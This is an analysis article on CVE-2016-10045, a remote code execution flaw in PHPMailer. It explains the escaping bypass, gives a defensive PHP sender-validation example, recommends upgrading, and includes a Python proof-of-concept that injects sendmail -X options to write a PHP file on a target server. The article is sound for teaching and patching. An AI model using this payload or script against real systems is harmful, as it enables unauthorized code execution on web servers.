Analysis of CVE-2016-10045: RCE in PHPMailer
CVE-2016-10045[1] is a critical vulnerability in PHPMailer[2], a widely used library for sending emails in PHP[3] web applications, affecting versions prior to 5.2.18. This vulnerability allows attackers to execute malicious code on a compromised web server by exploiting an input validation flaw in the PHPMailer code.
Intro
PHPMailer remains one of the most widely used email-sending libraries, with approximately 9 million users worldwide. It is also used in numerous open-source projects such as WordPress, Drupal, and Joomla.
This vulnerability is particularly critical because, in most cases, the attacker does not need to be an authenticated user to inject malicious code and perform a remote code execution (RCE)[4] on a web server.
To exploit this vulnerability, an attacker simply needs to identify a form field that uses PHPMailer for email sending and submit the payload.
Description
This vulnerability stems from an inadequate fix for CVE-2016-10033[5]. In PHPMailer version 5.2.17, the $Sender variable is sanitized using the escapeshellarg() function before being passed to the mail() function. However, an attacker can add an extra single quotation mark that isn’t properly escaped, breaking the intended flow of escapeshellarg().
Example:
$mail->SetFrom("\"Attacker\\' -Param2 -Param3\"@test.com", 'Client Name');
The above will result in the following list of arguments being passed to the email-sending application:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-f\"Attacker\\\]
Arg no. 4 == [-Param2]
Arg no. 5 == [-Param3"@test.com']
The attacker can pass the -X parameter to create a log containing arbitrary PHP code, making versions prior to 5.2.20 vulnerable to remote code execution (RCE).
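The lesson of the description above is that escaping the sender value is not enough once it reaches the sendmail argument list; a defender should instead refuse any sender that is not drawn from a strict character allowlist and drop the -f parameter entirely when validation fails. The following is an added example written for this article, not PHPMailer's own code; the helper names isShellSafeSender and buildSenderParams are hypothetical, and the two test inputs are constructed (the second one is the malformed address from the example above).

```php
<?php
// Added example (not PHPMailer's code): allowlist validation of a sender
// address before it is used to build the "-f" additional parameter for mail().
// Rather than quoting or escaping the value, anything outside a strict
// character set is rejected, so no argument separator or quote can survive.

/**
 * Hypothetical helper: true only if $address is a plain local@domain address
 * made of [A-Za-z0-9._-] characters. Whitespace, quotes and backslashes, which
 * the CVE-2016-10045 bypass relies on, are never accepted.
 */
function isShellSafeSender(string $address): bool
{
    return preg_match('/^[A-Za-z0-9._-]+@[A-Za-z0-9.-]+$/', $address) === 1;
}

/**
 * Hypothetical helper: build the additional_parameters string for mail().
 * Returns null (send without -f) when the sender fails validation, instead of
 * escaping the value and hoping the escaping holds downstream.
 */
function buildSenderParams(?string $sender): ?string
{
    if ($sender === null || $sender === '' || !isShellSafeSender($sender)) {
        return null;
    }
    return '-f' . $sender;
}

// Constructed inputs: a legitimate sender and the malformed one quoted in the
// description above.
$cases = [
    'alice@example.com',
    "\"Attacker\\' -Param2 -Param3\"@test.com",
];

foreach ($cases as $candidate) {
    $params = buildSenderParams($candidate);
    printf(
        "%-45s -> %s\n",
        $candidate,
        $params === null ? 'REJECTED (no -f passed to mail())' : $params
    );
}
```

Running this prints the first address as -falice@example.com and the second as rejected. The design choice is to validate rather than escape: the regex never lets a space, quote or backslash through, so even if a later layer re-escapes the string there is nothing left to break out of.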
Proof of Concept
Python script to exploit the vulnerability:
#!/usr/bin/env python3
import requests
import argparse
import re

def exploit(url, dir):
    # Default to HTTPS when no scheme is given
    if not re.match(r'^https?://', url):
        url = f"https://{url}"
    payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php some\"@email.com" % dir
    code = "<?php phpinfo(); ?>"
    # Form fields expected by the example contact form
    data = {'action': 'send', 'name': 'LESIS', 'email': payload, 'msg': code}
    response = requests.post(url, data=data)
    if response.status_code == 200:
        print("Exploitation successful!")
    else:
        print("Exploitation failed.")

def main():
    parser = argparse.ArgumentParser(description='CVE-2016-10045 | PHPMailer')
    parser.add_argument('-t', '--target', required=True, help='Target URL')
    parser.add_argument('-d', '--dir', required=True, help='Remote recording directory')
    args = parser.parse_args()
    if args.target and args.dir:
        exploit(args.target, args.dir)

if __name__ == '__main__':
    main()
Conclusion
The vulnerability arises from improper input sanitization in PHPMailer, allowing attackers to execute malicious code on compromised web servers. This poses a significant risk, as exploitation can be carried out without requiring authentication, allowing for remote code execution (RCE) in vulnerable applications.
The potential impact of a successful exploitation includes the execution of arbitrary code, which potentially leads to security breaches and unauthorized access to sensitive information.
The recommended mitigation is to update PHPMailer to version 5.2.20 or higher.
References